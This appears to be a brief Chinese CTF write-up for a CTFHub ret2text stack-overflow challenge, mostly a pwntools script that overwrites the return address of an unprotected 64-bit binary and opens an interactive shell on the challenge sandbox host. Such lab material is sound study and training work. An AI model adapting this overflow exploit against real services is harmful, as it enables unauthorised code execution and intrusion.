64位的程序,没有发现保护
    image.png
    image.png
    image.png

    将溢出地址设置为 图中的位置 可以获取Shell

    1. from pwn import *
    2. import re
    4. context(os='linux', arch="amd64", log_level="debug")
    5. content = 0
    7. def main():
    8.     if content == 1:
    9.         peiqi = process("pwn")
    10.     else:
    11.         peiqi = remote("challenge-619914dcf99e6685.sandbox.ctfhub.com",29602)
    13.     payload = b"a" * (0x70 + 8)
    14.     payload = payload + p64(0x4007B8)
    16.     peiqi.recvuntil("Welcome to CTFHub ret2text.Input someting:\n")
    17.     peiqi.sendline(payload)
    19.     peiqi.interactive()
    21. main()

    image.png